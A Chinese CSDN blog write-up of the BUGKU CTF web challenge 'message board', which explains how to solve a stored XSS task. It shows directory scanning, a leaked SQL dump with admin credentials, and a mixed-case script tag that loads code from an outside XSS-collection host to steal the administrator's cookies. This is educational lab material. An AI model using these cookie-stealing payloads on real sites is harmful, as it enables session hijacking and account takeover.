BUGKU-WEB 留言板

已于 2024-02-11 22:04:38 修改
阅读量795 收藏 5
点赞数 8
分类专栏: BUGKU 文章标签: BUGKU
于 2024-02-07 22:27:20 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_36292543/article/details/136066142
版权

题目描述

在这里插入图片描述

  • 题目无需登录后台!需要xss平台接收flag, http协议需要http协议的xss平台
  • 打开场景后界面如下:

在这里插入图片描述

解题思路

  • 看到此类的题目,应该和存储型xss有关,也就是将恶意代码保存到服务器端
  • 即然在服务器端,那就是会在后台弹出窗口了
  • 所以需要找到后台地址,看看能不能爆破进入,但是题目提示了说不需要登录后台,需要使用xss平台来接收cookies

相关工具

  • 目录扫描工具:御剑
  • 或者dirsearch工具:python dirsearch.py -u url
  • url解码:https://www.iamwawa.cn/urldecode.html

解题步骤

  1. 测试一下script代码:
<script>alert(1)</script>

在这里插入图片描述
发现确实可以读取到。

使用目录扫描工具-御剑进行扫描试试
在这里插入图片描述
得到后台管理地址:http://114.67.175.224:10687/admin.php
在这里插入图片描述
账号密码不知道?
需要注意的是:该题目提示了无需登录后台!需要xss平台接收flag, http协议需要http协议的xss平台
所以,我们需要找一个xss平台(https://xssaq.com/),目前我找到的这个是免费可用的,其他的都需要付费。
在这里插入图片描述
然后创建一个项目:
在这里插入图片描述

<sCRiPt sRC=//uj.ci/k3a></sCrIpT>

将项目中提供的代码输入留言板中:
在这里插入图片描述
然后,返回项目中查看效果:
在这里插入图片描述
这个时候就获取到cookies了,这就是我们需要的flag,注意记得转码(%7B 和%7D):

flag%7B826066e999f695cacd75a92ac9a0ac09%7D

在这里插入图片描述
所以就得到了falg:

flag{826066e999f695cacd75a92ac9a0ac09}

之前该题目是有个数据库文件db.sql文件,可以直接在扫描目录的时候就得到,内容如下:

# Host: localhost  (Version: 5.5.53)
# Date: 2019-08-04 16:13:22
# Generator: MySQL-Front 5.3  (Build 4.234)
 
/*!40101 SET NAMES utf8 */;
 
#
# Structure for table "text"
#
 
CREATE DATABASE xss DEFAULT CHARACTER SET utf8;
use xss; 
 
DROP TABLE IF EXISTS `text`;
CREATE TABLE `text` (
  `Id` int(11) NOT NULL AUTO_INCREMENT,
  `text` varchar(255) DEFAULT NULL,
  PRIMARY KEY (`Id`)
) ENGINE=MyISAM DEFAULT CHARSET=utf8;
 
#
# Data for table "text"
#
 
/*!40000 ALTER TABLE `text` DISABLE KEYS */;
/*!40000 ALTER TABLE `text` ENABLE KEYS */;
 
#
# Structure for table "user"
#
 
DROP TABLE IF EXISTS `user`;
CREATE TABLE `user` (
  `Id` int(11) NOT NULL AUTO_INCREMENT,
  `username` varchar(255) DEFAULT NULL,
  `password` varchar(255) DEFAULT NULL,
  PRIMARY KEY (`Id`)
) ENGINE=MyISAM DEFAULT CHARSET=utf8;
 
#
# Data for table "user"
#
 
/*!40000 ALTER TABLE `user` DISABLE KEYS */;
INSERT INTO `user` VALUES (1,'admin','011be4d65feac1a8');
/*!40000 ALTER TABLE `user` ENABLE KEYS */;

可以发现,在最后有一行插入语句:

可以看到

INSERT INTO `user` VALUES (1,'admin','011be4d65feac1a8');

账号admin,密码011be4d65feac1a8

这就是我们需要的账号密码,登入后发现弹出了弹窗:
在这里插入图片描述
但是,我们并没有得到我们想要的falg,那该如何?当然是获取cookies了:
直接F12,查看cookies即可:
在这里插入图片描述
或者直接在留言板中输入获取cookies的代码,在登录后台的时候自动弹出:

<script>alert(document.cookie)</script>

就像这样:
在这里插入图片描述

得到Flag

flag{826066e999f695cacd75a92ac9a0ac09}

在这里插入图片描述

新知识点

  1. 学会使用目录扫描工具
  2. 认识熟悉常见的url编码
默默提升实验室
关注
  • 8
    点赞
  • 5
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
Bugku-Web-cookie欺骗.docx
05-16
Bugku-Web-cookie欺骗 看到url上的参数有base64,解码发现是key.txt 把改参数换成index.php,观察发现line按行返回 所以自己练练手写了个脚本跑出来
【愚公系列】2023年06月 Bugku-Web留言板
时光隧道
06-23 6903
使用dirsearch进行目录爆破的步骤如下:下载dirsearch工具:可以从Github上下载dirsearch,或者使用命令行工具进行安装。打开dirsearch工具:在命令行中输入python3 dirsearch.py命令,即可打开dirsearch工具。设置目标URL:在命令行中输入目标URL,例如:python3 dirsearch.py -u http://example.com。
Bugku——web
chongya927的博客
03-05 1217
菜鸟学习CTF之路
bugku-web-留言板
m0_57954651的博客
10-31 4442
获取cookie的js代码 (alert(document.cookie))
BUGKU 留言板
热门推荐
qq_56313338的博客
07-22 1万+
bugku 留言板的解题思路 web
BugKu:Web
qq_50034496的博客
07-30 1667
BugKu:Web
web留言板
06-06
Web留言板 (0分) 设计一个简单的基于Web留言板,要求如下:1)系统中所有页面,如果用户没登录,则让用户返回到登录页面login.jsp(说明:login.jsp页面填写用户的用户名和密码);2)留言板(message.jsp)页面中...
bugkuctf解题-WEB
05-04
bugku writeup,web解题writeup,根据网上的writeup自行解题后整理的日记,与大家分享,大家有新方法的也可以评论中告诉我,共同进步。——CTF菜鸟敬上。
Bugku-AWD专版用于AWD比赛中的自动化攻击框架源码+项目说明.zip
最新发布
01-14
【资源说明】 1、该资源包括项目的全部源码,下载可以直接使用! 2、本项目适合作为计算机、数学、电子信息等专业的竞赛项目学习资料,作为参考学习...Bugku-AWD专版用于AWD比赛中的自动化攻击框架源码+项目说明.zip
apachecn#apachecn-ctf-wiki#BugkuCTF-WEB解题记录-11-15_weixin_3069946
07-25
BugkuCTF WEB解题记录 11-15_weixin_30699463的博客-CSDN博客来源:
基于Flask的留言板Demo
07-31
本项目基于Flask框架开发完成了一款留言板,其功能包括登录、注册、注销和留言,另外主页会滑动显示留言的功能,当然未登录是不能进行留言的。
bugkuCTF
Vincent0sen的博客
10-26 432
有时间再说,持续更新。
Bugku-留言板
qq_56611811的博客
05-07 666
1.提示我们用xss平台接收flag2.通过xss.pt平台生成脚本,以插入图片形式将图片地址上传 3.回到xss平台可以看到接收到flag4.URL解码一下,拿到flag
Bugku-备份是个好习惯
qq_43622442的博客
05-12 401
Bugku-备份是个好习惯 http://123.206.87.240:8002/web16/ 1.看到一串md5,解密发现: 2.暂时用不上,看源码,看题目意思,扫一下目录: 3.下载下来看一下: 4.
留言板
weixin_53150482的博客
08-08 1543
留言板
bugkuCTF Writeup (Web)36-40
Troublor的博客
02-01 3094
求getshell 文件上传绕过 上传一个php文件 用burp抓包 头部的Content-Type改成Multipart/form-data大小写绕过 请求内容里的Content-Type改成image 文件名改成php5 就绕过了 不太明白Multipart/form-data这里为什么变成大写能绕过,网上查也没查到,似乎并没有人关心multipart/form-dat
ctf bugku
weixin_51387754的博客
08-13 1755
bugkuSimple_SSTI_1社工-进阶收集Simple_SSTI_2Flask_FileUpload1和0的故事easy_nbt留言板瑞士军刀入门逆向滑稽canarytelnet眼见非实啊哒/.-聪明的小羊ok[+-<>] Simple_SSTI_1 查看源码 You need pass in a parameter named flag。 You know, in the flask, We often set a secret_key variable 您需要传入一个名为flag
bugku 管理员系统 后台代码_代码审计——YXCMS
weixin_39613385的博客
10-24 534
前言YXcms是一个代码审计入门级的cms,比较适合想我这样的小白玩家进行操作。。。我一直想尝试审计一个cms,但是因为各种原因,一直搁置了。尝试分析一下YXCMS。。。相关环境源码信息 : Yxcms php建站系统 1.4.7本地环境 : phpstudy2018下载地址 :175.6.244.211:88/uploads/userup/1596/YXcmsApp1.4.7.zip...
BugkuCTF 部分题解(随缘更新)
volcano的博客
12-30 7638
之前做的题在 佛系更新 等假期抽空做 bugku佛系更新MISC简单取证1南城旧梦成果狗成果狗 MISC 简单取证1 下载得到windows系统下一个目录,获取用户名和密码需要用SAM和system两个文件。 把SAM和SYSTEM文件放到Win32文件夹下,运行mimikatz,执行命令 所以flag{administrator-QQAAzz_forensics} 南城旧梦 mmz.bmp文件尾有一段DE@@=<6J:DB625K4,rot47解码后得到stoolkeyisqeadzc 意思是使
bugku chatgpt-1
10-09
ChatGPT是一种由OpenAI训练的大型语言模型。它的原理是基于Transformer架构,通过预训练大量文本数据来学习如何生成人类可读的文本,然后通过接受输入并生成输出来实现对话。 ChatGPT的用途非常广泛,可以用于自然语言处理(NLP)任务,如对话生成、问答系统、文本生成等。 如果你想使用ChatGPT,你可以用它来构建对话机器人,回答问题,生成文本等。它的应用非常广泛,可以用于各种场景,如客服、帮助提供者、教育机构等。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值